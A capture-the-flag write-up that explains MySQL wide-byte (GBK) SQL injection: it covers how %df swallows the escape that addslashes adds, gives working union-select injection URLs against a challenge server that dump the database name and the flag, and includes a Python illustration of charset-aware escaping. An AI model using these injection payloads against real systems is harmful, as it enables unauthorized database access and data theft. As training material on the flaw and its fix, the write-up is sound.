BugKuCTF—sql injection Writeup
Challenge address: http://103.238.227.13:10083/
First, construct the link
http://103.238.227.13:10083/?id=1'
The page does not respond, so some filtering is in place. Right-clicking to view the page source shows the declared encoding GB2312, which suggests a MySQL wide byte injection.
A brief explanation of what wide byte injection is:
1. After the server receives the data sent by the front end via GET, it can filter specific characters with PHP functions such as addslashes, mysql_real_escape_string and mysql_escape_string, which insert an escape character in front of them. This makes those characters lose their special meaning when the SQL statement is assembled later. The
filtered characters are
(1) the ASCII NUL character \x00,
(2) the newline character \n (not escaped by addslashes),
(3) the carriage return character \r (not escaped by addslashes),
(4) the backslash character \,
(5) the single quote character ',
(6) the double quote character ",
(7) \x1a (not escaped by addslashes)
2. When MySQL uses GBK encoding, it treats two bytes as one Chinese character. If we write the injection link as
http://103.238.227.13:10083/?id=1%df'
then after %df' is sent to the backend PHP for processing it becomes %df\' . The byte encoding of %df\' is %df%5c' , and MySQL reads %df%5c as the single Chinese character 運 (yun), so the escape character \ that PHP's filtering added is swallowed into that character and the filter is bypassed.
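To make the byte-level mechanism concrete, here is an added Python example that is not part of the writeup. It models a byte-oriented escaping step (how addslashes behaves on raw input), decodes the result as MySQL would under a GBK connection charset, and checks whether the quote is still neutralised; it then shows the charset-aware alternative, where the text is decoded before escaping so the backslash can no longer be absorbed into a multibyte character. The helper names (addslashes_bytes, escaped_as_seen_by_mysql, quote_is_neutralised, escape_charset_aware) and the sample payload are constructed for this illustration; no database is contacted.

```python
# Added example (not from the writeup): why byte-level escaping fails when
# MySQL decodes the query as GBK, and what charset-aware escaping changes.
# All inputs are constructed inline; nothing talks to a server or database.

# Bytes that addslashes() escapes: ' " \ and NUL (\n, \r, \x1a are NOT escaped).
ESCAPED = {0x27, 0x22, 0x5C, 0x00}


def addslashes_bytes(data: bytes) -> bytes:
    """Byte-oriented escaping, as PHP addslashes()/mysql_escape_string() behave
    on raw input: a backslash is inserted before each special byte, with no
    knowledge of the character set the bytes will later be decoded in."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escaped_as_seen_by_mysql(raw: bytes, charset: str) -> str:
    """Escape at the byte level, then decode as the connection charset would.
    Under GBK the inserted 0x5C can become the trail byte of a 2-byte character."""
    return addslashes_bytes(raw).decode(charset, errors="replace")


def quote_is_neutralised(decoded: str) -> bool:
    """True if every single quote in the decoded text is preceded by a backslash,
    i.e. the escaping survived decoding and the quote cannot end the string literal."""
    for i, ch in enumerate(decoded):
        if ch == "'" and (i == 0 or decoded[i - 1] != "\\"):
            return False
    return True


def escape_charset_aware(raw: bytes, charset: str) -> str:
    """Decode first, then escape characters. The backslash is now inserted between
    characters, not between bytes, so it cannot be swallowed. This is the effect of
    escaping with the connection charset set correctly (mysqli_set_charset before
    mysqli_real_escape_string); prepared statements avoid the issue entirely."""
    text = raw.decode(charset, errors="replace")
    return "".join("\\" + ch if ord(ch) in ESCAPED else ch for ch in text)


# Constructed input: the writeup's id=1%df' after the web server URL-decodes it.
PAYLOAD = b"1\xdf'"

if __name__ == "__main__":
    gbk_view = escaped_as_seen_by_mysql(PAYLOAD, "gbk")
    print("GBK, byte-level escaping:   ", repr(gbk_view), quote_is_neutralised(gbk_view))
    utf8_view = escaped_as_seen_by_mysql(PAYLOAD, "utf-8")
    print("UTF-8, byte-level escaping: ", repr(utf8_view), quote_is_neutralised(utf8_view))
    safe_view = escape_charset_aware(PAYLOAD, "gbk")
    print("GBK, charset-aware escaping:", repr(safe_view), quote_is_neutralised(safe_view))
```

Run it and the first line shows the three-character string "1", the GBK character formed from 0xDF 0x5C, and an unescaped quote; the UTF-8 decoding keeps the backslash because 0xDF 0x5C is not a valid sequence there, and the charset-aware path keeps the quote escaped under GBK as well.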
Back to the challenge: use wide byte injection to build the POC and dump the database name
http://103.238.227.13:10083/?id=1%df' union select 1,database() %23
Here %23 is the character #, MySQL's comment marker; it comments out the trailing quote.
This reveals the database sql5; then, following the hint, build the POC to get the flag
http://103.238.227.13:10083/?id=1%df' union select 1,string from sql5.key %23